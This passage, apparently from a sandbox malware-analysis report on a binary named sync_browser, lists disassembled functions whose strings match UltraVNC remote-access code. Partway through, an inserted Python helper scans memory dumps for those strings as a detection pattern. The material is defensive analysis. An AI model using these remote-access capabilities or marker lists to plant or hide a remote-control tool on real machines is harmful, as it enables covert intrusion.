                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                                    • String ID: -delsoftwarecad$p$runas
                                                                    • API String ID: 397093096-3343046257
                                                                    • Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                                    • Instruction ID: d7456952c72751c4f973c1ebb015e693c2b7e575b6a15cad204c2400caa22f6c
                                                                    • Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                                    • Instruction Fuzzy Hash: 9F11BA35518B95C5E7709B50F89939EB3A8FB88744F800236D69D42B94DF7CD16ACB40
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3778485334-0
                                                                    • Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                    • Instruction ID: 0b519915dc409b929192b16b4db1c90d3c040924e5bc3c1fb23feac0bf8d742b
                                                                    • Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                    • Instruction Fuzzy Hash: 6B31D235A1CB6A85E7509B55FC403AD73A8FB88764F600137DA8E827A5DF7CE066CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$FindFirstModuleName
                                                                    • String ID: *.dsm
                                                                    • API String ID: 1519589655-1970359449
                                                                    • Opcode ID: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                    • Instruction ID: 8ba37da3c9f9622e416c8fd7e5440f91d4a3149c8387f69e2807ebfc278ee7c4
                                                                    • Opcode Fuzzy Hash: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                    • Instruction Fuzzy Hash: 9531723560869985EB608B25E9843AF63A0FB487B4F405332DA7E836D4DF3DE11AC700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$FileModuleNameQueryValue
                                                                    • String ID: UseRegistry$admin$admin_auth
                                                                    • API String ID: 1028385882-3376419731
                                                                    • Opcode ID: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                    • Instruction ID: c864c981fc3fc41b08c701b51707641f5cd3c61d0f12d24fa34b3fab4049cb7d
                                                                    • Opcode Fuzzy Hash: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                    • Instruction Fuzzy Hash: 2F212F31618A9AC2EB50CB50EC446AE73A8FB98794F801136EA4E83B54CF3DD567CB40
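The String IDs in the function entries above (UseRegistry / admin_auth / mslogon for the winvnc configuration and authentication paths, Software\UltraVNC, SeShutdownPrivilege, runas and -delsoftwarecad, the *.dsm plugin glob, and the vncpasswd.h and vnckeymap.cpp debug strings) are the kind of evidence behind the "Yara detected UltraVNC Hacktool" verdict in the report header. The following is an added triage helper, not Joe Sandbox's rule and not UltraVNC project code: it scans a raw dump or PE image for those marker strings in both ASCII and UTF-16LE form, groups hits by the capability each string evidences, and applies a conservative multi-category gate so that a single shared string such as "runas" does not trigger on its own. The marker list is limited to strings that appear on this page, the category grouping is the author's own reading of winvnc behaviour, and the sample bytes are constructed for illustration.

```python
"""Added example: locate the UltraVNC/winvnc marker strings listed in this
report inside a memory dump or PE image, in ASCII and UTF-16LE, and map the
hits to the capability each string evidences. Marker list and grouping are
this example's own assumptions drawn from the page, not a vendor signature."""
from __future__ import annotations

import re
from typing import Dict, List

# Category -> marker strings taken from the String ID / xrefs entries above.
MARKERS: Dict[str, List[str]] = {
    # INI-vs-registry configuration handling (PrivateProfile / RegCreate paths)
    "config_source": ["UseRegistry", r"Software\UltraVNC", "admin_auth"],
    # Legacy VNC password vs. Windows (mslogon) authentication selection
    "auth_mode": ["mslogon",
                  "unable to determine legacy authentication method",
                  "vncpasswd.h : PASSWD : ToText called"],
    # Token privilege adjustment and elevated relaunch (ShellExecute "runas")
    "privilege_use": ["SeShutdownPrivilege", "runas", "-delsoftwarecad"],
    # Search for DSM encryption plugins next to the module
    "dsm_plugin_load": ["*.dsm"],
    # Keyboard state injection from vnckeymap.cpp
    "input_injection": ["vnckeymap.cpp : setshiftstate"],
}


def _encodings(marker: str) -> Dict[str, bytes]:
    """winvnc is built as a wide-character app, so match both encodings."""
    return {"ascii": marker.encode("ascii"),
            "utf16le": marker.encode("utf-16-le")}


def scan_markers(data: bytes) -> Dict[str, List[dict]]:
    """Return {category: [{marker, encoding, offset}, ...]} for every hit.

    Hits are listed in marker order, then encoding order, then by offset,
    so results are deterministic and easy to diff between samples."""
    hits: Dict[str, List[dict]] = {}
    for category, markers in MARKERS.items():
        for marker in markers:
            for enc_name, needle in _encodings(marker).items():
                for m in re.finditer(re.escape(needle), data):
                    hits.setdefault(category, []).append(
                        {"marker": marker, "encoding": enc_name,
                         "offset": m.start()})
    return hits


def verdict(hits: Dict[str, List[dict]], min_categories: int = 3) -> bool:
    """Conservative gate: only call the image winvnc-like when several
    independent capability categories are evidenced, not one loose string."""
    return len(hits) >= min_categories


# Constructed sample image: a few markers in ASCII, one in UTF-16LE, padded
# with NULs. Not taken from the analysed sample.
SAMPLE_IMAGE = (
    b"\x00" * 16
    + b"UseRegistry\x00"                       # offset 16, ASCII
    + "mslogon".encode("utf-16-le")            # offset 28, UTF-16LE
    + b"\x00" * 8
    + b"SeShutdownPrivilege\x00"               # offset 50
    + b"*.dsm\x00"                             # offset 70
    + b"runas\x00"                             # offset 76
)

if __name__ == "__main__":
    found = scan_markers(SAMPLE_IMAGE)
    for category, entries in found.items():
        for e in entries:
            print(f"{category:16} {e['encoding']:7} 0x{e['offset']:06x} {e['marker']}")
    print("winvnc-like:", verdict(found))
```

To use it on a real artifact, read the dump with `open(path, "rb").read()` and pass the bytes to `scan_markers`; the offsets can then be cross-checked against the xrefs the report lists for the matching function. Because the gate counts categories rather than raw hits, a sample that only embeds the word "runas" or a single registry key name is not reported as winvnc-like.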
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AsyncState$Virtual
                                                                    • String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
                                                                    • API String ID: 2891131044-1915745809
                                                                    • Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                    • Instruction ID: 46040faba2a4ce8a0bbeafc46627510464e583b7050a4caa052b5df7319d883c
                                                                    • Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                    • Instruction Fuzzy Hash: C2118F22B28AAB86E6114F15B8001AE6769FB84745F480533ED8EC7665DF3DD53BC740
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Close$FileModuleNamePrivateProfile
• String ID: UseRegistry$admin
• API String ID: 3032973919-2802730080
• Opcode ID: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
• Instruction ID: f5656cddfbb62e7482c8f8f31f28002d50175fa5c241d384308abe808f092356
• Opcode Fuzzy Hash: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
• Instruction Fuzzy Hash: DD01E125E1DA6B81FE61AB54EC647BD2368FFA9754F850133C91EC2660CE3CE127C650
APIs
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
• Instruction ID: 0d6a486bd4e75e36eba8be3064ccdb005a584f5f2f162e887f95ff6d9fbc3a44
• Opcode Fuzzy Hash: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
• Instruction Fuzzy Hash: 50319532618B9695EB20CF25EC507AE73A8FB88754F500136EA9D83B94DF3CD566CB00
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Iconic
• String ID: 0
• API String ID: 110040809-4108050209
• Opcode ID: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
• Instruction ID: 0ed4aedf2754e2cbce3bb0ac59995899285adf6332fa6b94682a1fc2aa60b1e1
• Opcode Fuzzy Hash: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
• Instruction Fuzzy Hash: E5A149326046958EE7588F39D5407ACB7E0FB48B48F04803AEB59D7689DF39E8A5CB14
APIs
  • Part of subcall function 00007FF6DC0CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF6DC0CD3BB
• GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117D89
  • Part of subcall function 00007FF6DC117650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117689
  • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC1176DD
  • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC117722
  • Part of subcall function 00007FF6DC1178E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC11792E
  • Part of subcall function 00007FF6DC1178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6DC11796A
  • Part of subcall function 00007FF6DC1178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF6DC1179B2
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: PrivateProfile$CreateQueryValue$FileModuleName
• String ID: UseRegistry$admin$group3
• API String ID: 1728753321-3776872688
• Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
• Instruction ID: 3b579ee539b1640a04990943594bb9c8a3350051f76e04b18514d4aaad2ad556
• Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
• Instruction Fuzzy Hash: E1110C35E1C66A81EA21AB65EC613FD6358FFA8344F840537D64DC66A2CE3CE127CB40
APIs
  • Part of subcall function 00007FF6DC0CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF6DC0CD3BB
• GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117E50
  • Part of subcall function 00007FF6DC117650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117689
  • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC1176DD
  • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC117722
  • Part of subcall function 00007FF6DC1177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117840
  • Part of subcall function 00007FF6DC1177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF6DC11787D
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: PrivateProfile$Create$FileModuleNameQueryValue
• String ID: UseRegistry$admin$locdom1
• API String ID: 1788981264-2648182776
• Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
• Instruction ID: 0ad1e5c6c3d44f846458c6298e910e39149cc2936547de806b8c60abed446fb1
• Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
• Instruction Fuzzy Hash: 11015625A1C56B41F7119B64DC553BD1299EFA8304F800133D50DC2396DE3CE56BCA80
APIs
  • Part of subcall function 00007FF6DC0CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF6DC0CD3BB
• GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117EED
  • Part of subcall function 00007FF6DC117650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117689
  • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC1176DD
  • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC117722
  • Part of subcall function 00007FF6DC1177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117840
  • Part of subcall function 00007FF6DC1177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF6DC11787D
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: PrivateProfile$Create$FileModuleNameQueryValue
• String ID: UseRegistry$admin$locdom2
• API String ID: 1788981264-80830018
• Opcode ID: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
• Instruction ID: 29a1318dd3ef76bd8085d0c1e2500abcea30bd3f7d19bd1d6136c483e910eb09
• Opcode Fuzzy Hash: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
• Instruction Fuzzy Hash: 5C017121E1C56B81FA21DB78AC957BE1399EFB8304F810533D51DC5692CE3CE12BCA80
APIs
  • Part of subcall function 00007FF6DC0CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF6DC0CD3BB
• GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117F8D
  • Part of subcall function 00007FF6DC117650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117689
  • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC1176DD
  • Part of subcall function 00007FF6DC117650: RegCreateKeyExA.ADVAPI32 ref: 00007FF6DC117722
  • Part of subcall function 00007FF6DC1177F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF6DC117840
  • Part of subcall function 00007FF6DC1177F0: RegQueryValueExA.ADVAPI32 ref: 00007FF6DC11787D
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
Similarity
• API ID: PrivateProfile$Create$FileModuleNameQueryValue
• String ID: UseRegistry$admin$locdom3
• API String ID: 1788981264-1943432916
• Opcode ID: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
• Instruction ID: 30ce5244de5e4e980a20a5252944987d026c3f15c4b2d66afae5b0251bfa0c52
• Opcode Fuzzy Hash: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
• Instruction Fuzzy Hash: 86017521E1C56B81FA11DB74AC957BE5399EFB8304F800533D51DC6692CE3CE16BCA40
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
